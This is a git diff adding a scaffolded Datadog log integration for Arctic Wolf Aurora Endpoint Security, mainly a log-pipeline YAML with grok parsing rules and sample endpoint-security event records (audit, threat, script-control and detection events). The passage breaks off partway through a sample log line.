diff --git a/arctic_wolf_aurora_endpoint_security/CHANGELOG.md b/arctic_wolf_aurora_endpoint_security/CHANGELOG.md new file mode 100644 index 0000000000000..204b53b346397 --- /dev/null +++ b/arctic_wolf_aurora_endpoint_security/CHANGELOG.md @@ -0,0 +1,4 @@ +# CHANGELOG - Arctic Wolf Aurora Endpoint Security + + + diff --git a/arctic_wolf_aurora_endpoint_security/README.md b/arctic_wolf_aurora_endpoint_security/README.md new file mode 100644 index 0000000000000..74a355673a908 --- /dev/null +++ b/arctic_wolf_aurora_endpoint_security/README.md @@ -0,0 +1,64 @@ +# Agent Integration: Arctic Wolf Aurora Endpoint Security + +## Overview + +This integration monitors [Arctic Wolf Aurora Endpoint Security][4]. + +## Setup + +### Installation + +The Arctic Wolf Aurora Endpoint Security check is included in the [Datadog Agent][2] package. +No additional installation is needed on your server. + +### Configuration + +!!! Add list of steps to set up this integration !!! + +### Validation + +!!! Add steps to validate integration is functioning as expected !!! + +## Data Collected + +### Metrics + +Arctic Wolf Aurora Endpoint Security does not include any metrics. + +### Log Collection + + +1. Collecting logs is disabled by default in the Datadog Agent. Enable it in the `datadog.yaml` file with: + + ```yaml + logs_enabled: true + ``` + +2. Add this configuration block to your `arctic_wolf_aurora_endpoint_security.d/conf.yaml` file to start collecting your Arctic Wolf Aurora Endpoint Security logs: + + ```yaml + logs: + - type: file + path: /var/log/Arctic Wolf Aurora Endpoint Security.log + source: arctic_wolf_aurora_endpoint_security + service: + ``` + + Change the `path` and `service` parameter values and configure them for your environment. + +3. [Restart the Agent][3]. + +### Events + +The Arctic Wolf Aurora Endpoint Security integration does not include any events. + +## Troubleshooting + +Need help? Contact [Datadog support][1]. + +[1]: https://docs.datadoghq.com/help/ +[2]: https://app.datadoghq.com/account/settings/agent/latest +[3]: https://docs.datadoghq.com/agent/configuration/agent-commands/#start-stop-and-restart-the-agent +[4]: **LINK_TO_INTEGRATION_SITE** +[5]: https://github.com/DataDog/integrations-core/blob/master/arctic_wolf_aurora_endpoint_security/assets/service_checks.json + diff --git a/arctic_wolf_aurora_endpoint_security/assets/configuration/spec.yaml b/arctic_wolf_aurora_endpoint_security/assets/configuration/spec.yaml new file mode 100644 index 0000000000000..edad949cdd928 --- /dev/null +++ b/arctic_wolf_aurora_endpoint_security/assets/configuration/spec.yaml @@ -0,0 +1,9 @@ +name: Arctic Wolf Aurora Endpoint Security +files: +- name: arctic_wolf_aurora_endpoint_security.yaml + options: + - template: logs + example: + - type: file + path: /var/log/arctic_wolf_aurora_endpoint_security.log + source: arctic_wolf_aurora_endpoint_security diff --git a/arctic_wolf_aurora_endpoint_security/assets/dashboards/arctic_wolf_aurora_endpoint_security_overview.json b/arctic_wolf_aurora_endpoint_security/assets/dashboards/arctic_wolf_aurora_endpoint_security_overview.json new file mode 100644 index 0000000000000..e69de29bb2d1d diff --git a/arctic_wolf_aurora_endpoint_security/assets/logs/arctic-wolf-aurora-endpoint-security.yaml b/arctic_wolf_aurora_endpoint_security/assets/logs/arctic-wolf-aurora-endpoint-security.yaml new file mode 100644 index 0000000000000..d667f65b22c55 --- /dev/null +++ b/arctic_wolf_aurora_endpoint_security/assets/logs/arctic-wolf-aurora-endpoint-security.yaml @@ -0,0 +1,1360 @@ +id: arctic-wolf-aurora-endpoint-security +metric_id: arctic-wolf-aurora-endpoint-security +backend_only: false +facets: + - groups: + - Web Access + name: Browser + path: http.useragent_details.browser.family + source: log + - groups: + - Web Access + name: Device + path: http.useragent_details.device.family + source: log + - groups: + - Web Access + name: OS + path: http.useragent_details.os.family + source: log + - groups: + - Geoip + name: City Name + path: network.client.geoip.city.name + source: log + - groups: + - Geoip + name: Continent Code + path: network.client.geoip.continent.code + source: log + - groups: + - Geoip + name: Continent Name + path: network.client.geoip.continent.name + source: log + - groups: + - Geoip + name: Country ISO Code + path: network.client.geoip.country.iso_code + source: log + - groups: + - Geoip + name: Country Name + path: network.client.geoip.country.name + source: log + - groups: + - Geoip + name: Subdivision ISO Code + path: network.client.geoip.subdivision.iso_code + source: log + - groups: + - Geoip + name: Subdivision Name + path: network.client.geoip.subdivision.name + source: log + - groups: + - Geoip + name: Destination City Name + path: network.destination.geoip.city.name + source: log + - groups: + - Geoip + name: Destination Continent Code + path: network.destination.geoip.continent.code + source: log + - groups: + - Geoip + name: Destination Continent Name + path: network.destination.geoip.continent.name + source: log + - groups: + - Geoip + name: Destination Country ISO Code + path: network.destination.geoip.country.iso_code + source: log + - groups: + - Geoip + name: Destination Country Name + path: network.destination.geoip.country.name + source: log + - groups: + - Geoip + name: Destination Subdivision ISO Code + path: network.destination.geoip.subdivision.iso_code + source: log + - groups: + - Geoip + name: Destination Subdivision Name + path: network.destination.geoip.subdivision.name + source: log +pipeline: + type: pipeline + name: Arctic Wolf Aurora Endpoint Security + enabled: true + filter: + query: source:arctic-wolf-aurora-endpoint-security + processors: + - type: date-remapper + name: Define `syslog.timestamp` as the official date of the log + enabled: true + sources: + - syslog.timestamp + - type: grok-parser + name: Parse common log format + enabled: true + source: message + samples: + - 'Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f3, Tenant Name: + TenantName, Event Type: AuditLog, Event Name: LoginFailure, Message: + {"data":[["Cylance Administrator Password","One-Time + Password"]],"clientIp":"163.116.205.118"}, User: John Carter + (john.carter@example.com), Eco Id: AqplNaZ7IyIQjDzBguyH5Ba=' + - 'Tenant Name: TenantName, Event Type: AuditLog, Event Name: + LoginFailure, Message: {"data":[["Cylance Administrator + Password","One-Time Password"]],"clientIp":"163.116.205.118"}, User: + John Carter (john.carter@example.com), Eco Id: + AqplNaZ7IyIQjDzBguyH5Ba=' + - 'Event Type: AuditLog, Event Name: LoginFailure, Message: + {"data":[["Cylance Administrator Password","One-Time + Password"]],"clientIp":"163.116.205.118"}, User: John Carter + (john.carter@example.com), Eco Id: AqplNaZ7IyIQjDzBguyH5Ba=' + - 'Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f4, Event Type: + AuditLog, Event Name: LoginFailure, Message: {"data":[["Cylance + Administrator Password","One-Time + Password"]],"clientIp":"163.116.205.118"}, User: John Carter + (john.carter@example.com), Eco Id: AqplNaZ7IyIQjDzBguyH5Ba=' + - "Event Name: OpticsCaeApiEvent, Device Name: SECURITYSERVER3, Zone + Names: (ZoneOne,ZoneTwo), Event Id: + d29ee101-a2a2-42f1-b9ab-7e4b18aeeef1, Severity: High, Description: + Test - API Sensor, High priority event, Instigating Process Name: + IReadCredentials.exe, Instigating Process Owner: + PENTEST//Administrator, Instigating Process ImageFileSha256: + E24F5A2B51EC1C260388348AF764B8794CE0566749F5801D024B7B422C63DC56, + Event Timestamp: 2022-09-28T14:23:37.384Z, Event Received Timestamp: + 2022-09-28T14:24:30Z, Device Last Reported Users: + (PENTEST\\Administrator), Zone Ids: + (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), + Detection Rule Id: be7403ca-a9f4-4aa7-ad6d-7c672bfa8fc9, Instigating + Process Command Line: IReadCredentials.exe, Instigating Process File + Path: c:\\apisensor\\ireadcredentials.exe, API DLL: Advapi32.dll, API + Function: CredEnumerateW, API Parameters: Unknown" + grok: + supportRules: PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: "parse_rule (Tenant ID: %{notSpace:tenant_id}, )?(Tenant Name: + %{PARSE_TILL_COMMA2:tenant_name}, )?(Event Type: + %{notSpace:event_type}, )?Event Name: %{PARSE_TILL_COMMA2:evt.name}, + %{data:additional_details}" + - type: category-processor + name: Categorise `service` based on `event_type` + enabled: true + categories: + - filter: + query: "@event_type:(AuditLog OR AppControl OR Device OR DeviceControl OR + ExploitAttempt OR ScriptControl OR Threat OR + ThreatClassification)" + name: desktop-events + - filter: + query: "@event_type:(OpticsCaeProcessEvent OR OpticsCaeFileEvent OR + OpticsCaeRegistryEvent OR OpticsCaeNetworkEvent OR + OpticsCaeMemoryEvent OR OpticsCaeDnsEvent OR OpticsCaeLogEvent OR + OpticsCaePowershellTraceEvent OR OpticsCaeWmiEvent OR + OpticsCaeComEvent OR OpticsCaeHttpEvent)" + name: detection-events + target: service + - type: category-processor + name: Categorize `service` based on `evt.name` for Aurora Protect API Sensor + Desktop Events + enabled: true + categories: + - filter: + query: "@evt.name:OpticsCaeApiEvent" + name: detection-events + target: service + - type: service-remapper + name: Define `service` as the official service of the log + enabled: true + sources: + - service + - type: pipeline + name: Processing Aurora Protect Desktop Application Control Events + enabled: true + filter: + query: "@event_type:AppControl" + processors: + - type: grok-parser + name: Parsing Aurora Protect Desktop Application Control Events + enabled: true + source: additional_details + samples: + - "Device Name: Unknown (test1), IP Address: (10.0.0.0), Action: Deny, + Action Type: PE File Change, File Path: , SHA256: + 56D1590A0D04771A1D5DBDEBEC7D4609A22B42085CEC07F0CF63222668FA5092, + Zone Names: (Windows Zone (Default)), Device Id: + 0929f443-2a56-46b3-bcfe-fc598da81d8b, Policy Name: Stage 3 - All + Threats AQT + Critical Exploit Prevention + Malicious Script + Prevention (Cylance Reference Policy)" + - "Device Name: WIN-7entSh64, IP Address: (192.168.119.125), Action: + Deny, Action Type: PEFileChange, File Path: + C:\\Users\\admin\\AppData\\Local\\Temp\\MyInstaller.exe, SHA256: + 04D4DC02D96673ECA9050FE7201044FDB380E3CFE0D727E93DB35A709B45EDAA), + Zone Names: (Script Test,Server Test)" + - "Device Name: WIN-7entSh64, IP Address: (192.168.119.125), Action: + Deny, Action Type: PEFileChange, File Path: + \\\\shared1\\psexec.exe, SHA256: + F8DBABDFA03068130C277CE49C60E35C029FF29D9E3C74C362521F3FB02670D5), + Zone Names: (Script Test,Server Test)" + grok: + supportRules: PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_appcontrol_rule Device Name: + %{PARSE_TILL_COMMA2:device_name}, IP Address: + %{notSpace:ip_addresses:array("()",",")}, Action: + (%{word:action})?, Action Type: %{PARSE_TILL_COMMA2:action_type}, + File Path: %{PARSE_TILL_COMMA2:file_path}, SHA256: + (%{notSpace:sha256})?, Zone Names: %{data:zone_names}(, Device Id: + (%{notSpace:device_id})?)?(, Policy Name: %{data:policy_name})?' + - type: pipeline + name: Processing Aurora Protect Desktop Audit Events + enabled: true + filter: + query: "@event_type:AuditLog" + processors: + - type: grok-parser + name: Parsing Aurora Protect Desktop Audit Events + enabled: true + source: additional_details + samples: + - 'Message: {"data":[["Cylance Administrator Password","One-Time + Password"]],"clientIp":"163.116.205.115"}, User: John Carter + (john.carter@example.com), Eco Id: AqplNaZ7IyIQjDzBguyH5Ba=' + - "Message: Policy Assigned: Focus; Devices: DESKTOP-Q401L6B, User: + John Carter (john.carter@example.com)" + - 'Message: + {"Enable":true,"Siem":"Other","UseSsl":false,"ServerAddress":"103.108.207.59","ServerPort":"9809","Protocol":"tcp","Severity":7,"Facility":16,"TenantIdentifierLogging":0,"EnableForAppControl":true,"EnableForAuditLog":true,"EnableForDevice":true,"EnableForExploitAttempt":true,"EnableForDeviceControl":true,"EnableForOptics":true,"EnableForThreat":true,"EnableForThreatClassification":true,"EnableForScriptControl":true,"EnableForMobileAlerts":true,"EnableForNetworkThreats":true,"EnableForDirectorySync":false,"EnableForAvert":true,"EnableForRiskAssessment":false,"EnableMessagesOver2KB":true,"EnableForCloudWorkload":false,"CustomToken":"","TenantPreferredNotificationEmails":null}, + User: John Carter (john.carter@example.com)' + - "Message: Device: IT’s MacBook Air was auto assigned to Zone: Mac + Zone (Default); Policy Changed: 'Default' to 'Stage 1 - Threat + Monitoring (Cylance Reference Policy)', User:" + grok: + supportRules: PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + matchRules: "parse_audit_rule Message: %{PARSE_TILL_COMMA:message}, User:( + %{data:user})?(, Eco Id: %{notSpace:eco_id})?" + - type: pipeline + name: Processing Aurora Protect Desktop Device Events + enabled: true + filter: + query: "@event_type:Device" + processors: + - type: grok-parser + name: Parsing Aurora Protect Device Desktop Event + enabled: true + source: additional_details + samples: + - "Device Names: (AssetTag-EID,IT’s MacBook Air,TEST-E7E9A2EH1), Zone Name: Test Devices, User: John Carter + (john.carter@example.com)" + - "Device Name: AssetTag-EID, Zone Names: (), Device Id: + b1f8e376-cee3-4319-a076-f587c51e68ab" + - "Device Names: (device1), User: John Carter (john.carter@example.com), + Zone Names: (Mac Zone (Default)), Device Ids: + (4ce89db7-c31f-4279-a979-35d78548a674)" + - "Device Message: Renamed: 'default' to 'Unknown'; Policy Changed: + 'Default' to 'IRVPolicy1'; Zones Added: 'IRV1', User: John Carter + (john.carter@example.com), Zone Names: (Windows Zone (Default)), + Device Id: 4af77c47-6b60-4807-ad95-ddabad5f4524" + - "Device Name: Unknown (test1), Last Scan: 11/25/2025 09:39:31, + Next Scan: 11/26/2025 06:53:24" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + PARSE_TILL_SINGLE_QUOTE %{regex("[^']*")} + matchRules: >- + parse_rule_device1 Device Message: Device: + %{PARSE_TILL_COMMA2:device_name}, User: %{PARSE_TILL_COMMA2:user}, + Zone Names: %{PARSE_TILL_COMMA:zone_names}, Device Id: + (%{notSpace:device_id})? + + parse_rule_device2 Device Message: Renamed: '%{PARSE_TILL_SINGLE_QUOTE:previous_device}' to '%{PARSE_TILL_SINGLE_QUOTE:device_name}'(; Policy Changed: '%{PARSE_TILL_SINGLE_QUOTE:previous_policy}' to '%{PARSE_TILL_SINGLE_QUOTE:policy_name}')?(; Zones Added: '%{PARSE_TILL_SINGLE_QUOTE:zones_added}')?, User: %{PARSE_TILL_COMMA2:user}(, Zone Names: %{PARSE_TILL_COMMA:zone_names})?(, Device Id: %{notSpace:device_id})? + + parse_rule_device3 Device Names: %{data:device_names:array("()",",")}, Zone Name: %{PARSE_TILL_COMMA2:zone_name}, User: %{data:user} + + parse_rule_device4 Device Names: %{data:device_names:array("()",",")}(, Policy Name: %{PARSE_TILL_COMMA2:policy_name})?, User: %{PARSE_TILL_COMMA2:user}(, Zone Names: %{data:zone_names})?(, Device Ids: %{notSpace:device_ids:array("()",",")})? + + parse_rule_device5 Device Name: %{PARSE_TILL_COMMA2:device_name}, Agent Version: %{PARSE_TILL_COMMA2:agent_version}, IP Address: %{notSpace:ip_addresses:array("()",",")}, MAC Address: %{notSpace:mac_addresses:array("()",",")}, Logged On Users: %{data:logged_on_users}, OS: %{PARSE_TILL_COMMA2:os}(, Kernel Version: %{PARSE_TILL_COMMA2:kernel_version})?(, Optics Version: %{PARSE_TILL_COMMA2:optics_version})?(, Zone Names: %{data:zone_names})? + + parse_rule_device6 Device Name: %{PARSE_TILL_COMMA2:device_name}, Last Scan: %{data:last_scan}(, Next Scan: %{data:next_scan})? + + parse_rule_device7 Device Name: %{data:device_name}(, Zone Names: %{data:zone_names})?(, Device Id: (%{notSpace:device_id})?)? + - type: pipeline + name: Processing Aurora Protect Desktop Device Control Events + enabled: true + filter: + query: "@event_type:DeviceControl" + processors: + - type: grok-parser + name: Parsing Aurora Protect Desktop Device Control Events + enabled: true + source: additional_details + samples: + - "Device Name: Test_Device_1, External Device Type: USBDrive, External Device + Vendor ID: 090B, External Device Name: USB Flash DISK USB Device, + External Device Product ID: 1001, External Device Serial Number: + 1408033910001642, Zone Names: (Windows Zone (Default)), Device Id: + cf753b5b-6ce6-4648-b2df-a827d3560b6a, Policy Name: Stage 3 - All + Threats AQT + Critical Exploit Prevention + Malicious Script + Prevention (Cylance Reference Policy)" + - "Device Name: Test_Device_1, External Device Type: USBDrive, External + Device Vendor ID: 1953, External Device Name: Generic USB Drive - + 2017/02/16-01, External Device Product ID: 0202, External Device + Serial Number: 575833314133343210041246, Zone Names: + (test_zone_02)" + grok: + supportRules: PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: "parse_device_control_rule Device Name: + %{PARSE_TILL_COMMA2:device_name}, External Device Type: + (%{notSpace:external_device_type})?, External Device Vendor ID: + (%{notSpace:external_device_vendor_id})?, External Device Name: + %{PARSE_TILL_COMMA2:external_device_name}, External Device Product + ID: (%{notSpace:external_device_product_id})?, External Device + Serial Number: (%{notSpace:external_device_serial_number})?, Zone + Names: %{data:zone_names}(, Device Id: %{notSpace:device_id})?(, + Policy Name: %{data:policy_name})?" + - type: pipeline + name: Processing Aurora Protect Desktop Memory Protection Events + enabled: true + filter: + query: "@event_type:ExploitAttempt" + processors: + - type: grok-parser + name: Parsing Aurora Protect Desktop Memory Protection Events + enabled: true + source: additional_details + samples: + - "Device Name: Unknown (test1), IP Address: (10.0.0.0), Action: Terminated, + Process ID: 18280, Process Name: SearchProtocolHost.exe, User + Name: admin, Violation Type: Direct System Calls, Zone Names: (Windows + Zone (Default)), Device Id: 0929f443-2a56-46b3-bcfe-fc598da81d8t, + Policy Name: Stage 3 - All Threats AQT + Critical Exploit + Prevention + Malicious Script Prevention (Cylance Reference + Policy)" + - "Device Name: WIN-7entSh64, IP Address: (192.168.119.125), Action: + Blocked, Process ID: 3804, Process Name: C:\\AttackTest64.exe, + User Name: admin, Violation Type: LSASS Read, Zone Names: (Script + Test,Server Test), Device ID: + e378dacb-9324-453a-b8c6-5a8406952192" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_memory_protection_rule Device Name: + %{PARSE_TILL_COMMA2:device_name}, IP Address: + %{notSpace:ip_addresses:array("()",",")}, Action: + (%{notSpace:action})?, Process ID: (%{notSpace:process_id})?, + Process Name: %{PARSE_TILL_COMMA2:process_name}, User Name: + %{PARSE_TILL_COMMA2:usr.name}, Violation Type: + %{PARSE_TILL_COMMA2:violation_type}, Zone Names: + %{data:zone_names}(, Device Id: (%{notSpace:device_id})?)?(, + Policy Name: %{data:policy_name})?' + - type: pipeline + name: Processing Aurora Protect Desktop Script Control Events + enabled: true + filter: + query: "@event_type:ScriptControl" + processors: + - type: grok-parser + name: Parsing Aurora Protect Desktop Script Control Events + enabled: true + source: additional_details + samples: + - "Device Name: Unknown (test1), File Path: c:/test1/test2, SHA256: + FEA0867AE0769D8858FFD94EA93EFBFE5C4531DB8CA75719D42BF074FE22F906, + Status: Unscored, Interpreter: Jscript, Interpreter Version: + 10.0.22621.5982, Zone Names: (Windows Zone (Default)), User Name: user1 + , Device Id: 0929f443-2a56-46b3-bcfe-fc598da81d8b, Policy Name: + Stage 3 - All Threats AQT + Critical Exploit Prevention + + Malicious Script Prevention (Cylance Reference Policy)" + - "Device Name: test1, File Path: c:/test1/test2, SHA256: + fe9b64defd8bf214c7490aa7f35b495a79a95e81f8943ee279dc99998d3d3444, + Status: Unscored, Interpreter: PowershellConsole, Interpreter + Version: 10.0.22621.1 (WinBuild.160101.0803), Zone Names: (Windows + Zone (Default)), User Name: user1, Device Id: + 191c967b-264c-46c3-999b-94c071e2e790, Policy Name: Focus" + - "Device Name: test1, File Path: c:/test1/test2, SHA256: + fe9b64defd8bf214c7490aa7f35b495a79a95e81f8943ee279dc99998d3d3441, + Interpreter: PowershellConsole, Interpreter Version: 10.0.22621.1 + (WinBuild.160101.0803), Zone Names: (Windows Zone (Default)), User + Name: , Device Id: 191c967b-264c-46c3-999b-94c071e2e79u, Policy + Name: Focus" + - "Device Name: Fake_Device, File Path: + d:\\windows\\system32\\windowspowershell\\v2.1\\newlyMade.vbs, + SHA256: + FE9B64DEFD8BF214C7490BB7F35B495A79A95E81F8943EE279DC99998D3D3440, + Interpreter: active, Interpreter Version: 6.1.7600.16385 + (win7_rtm.090713-1255), Zone Names: (Script Test,Server Test), + Device ID: e378dacb-9324-453a-b8c6-5a8406952195, Policy Name: + Default" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: "parse_script_control_rule Device Name: + %{PARSE_TILL_COMMA2:device_name}, File Path: + %{PARSE_TILL_COMMA2:file_path}, SHA256: (%{notSpace:sha256})?(, + Status: %{PARSE_TILL_COMMA2:script_control_status})?, Interpreter: + (%{notSpace:interpreter})?, Interpreter Version: + %{PARSE_TILL_COMMA2:interpreter_version}, Zone Names: + %{data:zone_names}(, User Name: %{PARSE_TILL_COMMA:user})?, Device + I(d|D): (%{notSpace:device_id})?, Policy Name: + %{data:policy_name}" + - type: pipeline + name: Processing of Aurora Protect Desktop Threat Events + enabled: true + filter: + query: "@event_type:Threat" + processors: + - type: grok-parser + name: Parsing Aurora Protect Desktop Threat Events + enabled: true + source: additional_details + samples: + - "Device Name: Fakedevice, IP Address: (10.0.0.0), File Name: file_1, Path: c:/test1/test2, Drive Type: + Internal Hard Drive, SHA256: + 1C7E66126306537A453D7A792978464AA8AD5AC2F34BD1FCCFFFE7E0B9C6D85A, + MD5: D2EBA7BA9D87AC9D902D39540C7854EA, Status: Quarantined, + Cylance Score: 100, Found Date: 11/18/2025 12:06:53 PM, File Type: + Executable, Is Running: False, Auto Run: False, Detected By: + FileWatcher, Zone Names: (Windows Zone (Default)), Is Malware: + True, Is Unique To Cylance: False, Threat Classification: Malware + - Trojan - msil/convagent, Device Id: + 3daa966a-3b70-4a5a-90fd-33aee165ea1a, Policy Name: Focus" + - "Device Name: Fake_Device, IP Address: (10.0.0.0), File Name: testfile, Path: c:/test/test1, Drive Type: + Internal Hard Drive, SHA256: + 93502C2277984F26EE5C0B7F74AA1045C5CF648F8511939CDAE130F051BCF7B4, + MD5: BA1D384701CD80CF80428F3729369584, Status: Default, Cylance + Score: 97, Found Date: 11/18/2025 12:48:16 PM, File Type: + Executable, Is Running: False, Auto Run: False, Detected By: + FileWatcher, Zone Names: (Windows Zone (Default)), Is Malware: + False, Is Unique To Cylance: False, Threat Classification: + UNCLASSIFIED, Device Id: 3daa966a-3b70-4a5a-90fd-33aee165ea1f, + Policy Name: Focus" + - "Device Name: Fake_Device, IP Address: (10.0.0.0), File Name: testfile, Path: c:/test/test1, Drive Type: + Internal Hard Drive, SHA256: + 780BB152049A5921FABBE0DE066B53C36BF45D895B60B1651E35C69052E6703D, + MD5: EDF913F2D9993F003E5FE25BE9A48929, Status: FileRemoved, + Cylance Score: 95, Found Date: 11/18/2025 12:37:25 PM, File Type: + Executable, Is Running: False, Auto Run: False, Detected By: + FileWatcher, Zone Names: (Windows Zone (Default)), Is Malware: + False, Is Unique To Cylance: False, Threat Classification: + UNCLASSIFIED, Device Id: 3daa966a-3b70-4a5a-90fd-33aee165ea1f, + Policy Name: Focus" + - "Device Name: Fake_Device, IP Address: (10.0.0.0), File Name: file_1, Path: c:/test/test1, Drive Type: + Internal Hard Drive, SHA256: + FD4BB08C311EB04165C7DE20F21B2A4BF78776ABAB859448976BDE951BC8F593, + MD5: 2E2D79BAF18F763D0059ED1149871D79, Status: Quarantined, + Cylance Score: 100, Found Date: 11/18/2025 2:42:14 PM, File Type: + Executable, Is Running: False, Auto Run: False, Detected By: + FileWatcher, Zone Names: (Windows Zone (Default)), Is Malware: + False, Is Unique To Cylance: False, Threat Classification: + UNCLASSIFIED, Device Id: 3daa966a-3b70-4a5a-90fd-33aee165ea1f, + Policy Name: Focus" + - "Device Name: SH-Win81-1, IP Address: (10.3.0.132), File Name: + virusshare_00fbc4cc4b42774b50a9f71074b79bd9, Path: + c:\\ruby\\host_automation\\test\\data\\test_files\\, Drive Type: + None, File Owner: SH-Win81-1\\Exampleuser, SHA256: + 1EBF3B8A61A7E0023AAB3B0CB24938536A1D87BCE1FCC6442E137FB2A7DD510B, + MD5: 1EBF3B8A61A7E0023AAB3B0CB24938536A1D87BCE1FCC6442E137FB2A7DD510A, Status: Unsafe, Cylance Score: 100, Found Date: 6/1/2015 + 10:57:42 PM, File Type: Executable, Is Running: False, Auto Run: + False, Detected By: FileWatcher, Zone Names: (Script Test,Server + Test), Is Malware: False, Is Unique to Cylance: False, Threat + Classification: File Unavailable" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_threat_rule Device Name: %{PARSE_TILL_COMMA2:device_name}, IP + Address: %{notSpace:ip_addresses:array("()",",")}, File Name: + %{PARSE_TILL_COMMA2:file_name}, Path: + %{PARSE_TILL_COMMA2:file_path}, Drive Type: + %{PARSE_TILL_COMMA2:drive_type}(, File Owner: + %{PARSE_TILL_COMMA2:file_owner})?, SHA256: (%{notSpace:sha256})?, + MD5: (%{notSpace:md5})?, Status: (%{word:Status})?, Cylance Score: + (%{integer:cylance_score})?, Found Date: + %{PARSE_TILL_COMMA2:found_date}, File Type: + %{PARSE_TILL_COMMA2:file_type}, Is Running: (%{word:is_running})?, + Auto Run: (%{word:auto_run})?, Detected By: + (%{notSpace:detected_by})?, Zone Names: + %{PARSE_TILL_COMMA:zone_names}, Is Malware: (%{word:is_malware})?, + Is Unique (t|T)o Cylance: (%{word:is_unique_to_cylance})?, Threat + Classification: %{data:threat_classification}(, Device Id: + %{notSpace:device_id})?(, Policy Name: %{data:policy_name})?' + - type: category-processor + name: Category processor for `file_state` + enabled: true + categories: + - filter: + query: "@cylance_score:[1 TO 59]" + name: Abnormal + - filter: + query: "@cylance_score:[60 TO 100]" + name: Unsafe + target: file_state + - type: pipeline + name: Processing Aurora Protect Desktop Threat Classification Events + enabled: true + filter: + query: "@event_type:ThreatClassification" + processors: + - type: grok-parser + name: Parsing Aurora Protect Desktop Threat Classification Events + enabled: true + source: additional_details + samples: + - "Threat Class: Malware, Threat Subclass: Dropper, Threat Family: + injuke, SHA256: + 5B63698F6FC9FBEE366BD01AF6A383652B09FC1B136A3408EB4187FD3C12973B, + MD5: 30AD7FF97EEDC9D14F06F9A8C96DC065" + - "SHA256: + 1218493137321C1D1F897B0C25BEF17CDD0BE9C99B84B4DD8B51EAC8F9794F68, + Threat Classification: Malware - Worm - QuKart" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: >- + rule1 Threat Class: %{PARSE_TILL_COMMA2:threat_class}, Threat + Subclass: %{PARSE_TILL_COMMA2:threat_subclass}, Threat Family: + %{PARSE_TILL_COMMA2:threat_family}, SHA256: (%{notSpace:sha256})?, + MD5: (%{notSpace:md5})? + + rule2 SHA256: (%{notSpace:sha256})?, Threat Classification: %{data:threat_classification} + - type: pipeline + name: Processing Aurora Focus Process Based Detection Events + enabled: true + filter: + query: "@event_type:OpticsCaeProcessEvent" + processors: + - type: grok-parser + name: Parsing Aurora Focus Process Based Detection Events + enabled: true + source: additional_details + samples: + - "Device Name: ADMIN, Zone Names: (Windows Zone (Default)), Event + Id: 1ac592a3-357f-43b9-86f5-6f750f809a2a, Severity: Low, + Description: Application Shimming Persistence (MITRE), Instigating + Process Name: svchost.exe, Instigating Process Owner: NT + AUTHORITY//SYSTEM, Instigating Process ImageFileSha256: + 949BFB5B4C7D58D92F3F9C5F8EC7CA4CEAFFD10EC5F0020F0A987C472D61C54A, + Event Timestamp: 2025-11-20T04:46:43.792Z, Event Received + Timestamp: 2025-11-20T04:46:51Z, Device Last Reported Users: + (admin\\test,Window Manager\\DWM-1,Window Manager\\DWM-2), Zone + Ids: (E79C47BC6292419DBD0AE117798FB353), Detection Rule Id: + 5e5b01a7-2bdf-49c9-a58b-82703706a84f, Instigating Process Command + Line: C:\\Windows\\system32\\svchost.exe -k + LocalSystemNetworkRestricted -p -s PcaSvc, Instigating Process + File Path: c:\\windows\\system32\\svchost.exe, Target Process + Name: sdbinst.exe, Target Process Owner: NT AUTHORITY//SYSTEM, + Target Process ImageFileSha256: + 7E6B42AF9D8B1E1A4EFDEEB152997C7C9BBFA010B2FCE65BEF29A2903819E0E6, + Device Id: 191c967b-264c-46c3-999b-94c071e2e790, Target Process + Command Line: C:\\Windows\\System32\\sdbinst.exe -m -bg, Target + Process File Path: c:\\windows\\system32\\sdbinst.exe" + - "Device Name: ADMIN, Zone Names: (Windows Zone (Default)), Event + Id: 72de5df2-5700-4977-9b66-580e6e697426, Severity: Low, + Description: Application Shimming Persistence (MITRE), Instigating + Process Name: svchost.exe, Instigating Process Owner: NT + AUTHORITY//SYSTEM, Instigating Process ImageFileSha256: + 949BFB5B4C7D58D92F3F9C5F8EC7CA4CEAFFD10EC5F0020F0A987C472D61C54A, + Event Timestamp: 2025-11-19T21:46:33.166Z, Event Received + Timestamp: 2025-11-19T21:46:42Z, Device Last Reported Users: + (admin\\test,Window Manager\\DWM-1,Window Manager\\DWM-2), Zone + Ids: (E79C47BC6292419DBD0AE117798FB354), Detection Rule Id: + 5e5b01a7-2bdf-49c9-a58b-82703706a84f, Instigating Process Command + Line: C:\\Windows\\system32\\svchost.exe -k + LocalSystemNetworkRestricted -p -s PcaSvc, Instigating Process + File Path: c:\\windows\\system32\\svchost.exe, Target Process + Name: sdbinst.exe, Target Process Owner: NT AUTHORITY//SYSTEM, + Target Process ImageFileSha256: + 7E6B42AF9D8B1E1A4EFDEEB152997C7C9BBFA010B2FCE65BEF29A2903819E0E8, + Device Id: 191c967b-264c-46c3-999b-94c071e2e790, Target Process + Command Line: C:\\Windows\\System32\\sdbinst.exe -m -bg, Target + Process File Path: c:\\windows\\system32\\sdbinst.exe" + - "Device Name: SECURITYSERVER2, Zone Names: (Jeff Test), Event Id: + dbe47fda-f37b-42cc-a308-9675feb7e36a, Severity: High, Description: + Jeffs Take 2 Powershell Download, Instigating Process Name: + cmd.exe, Instigating Process Owner: PENTEST//Administrator, + Instigating Process ImageFileSha256: + 935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2, + Event Timestamp: 2022-06-23T12:54:15.811Z, Event Received + Timestamp: 2022-06-23T12:54:41Z, 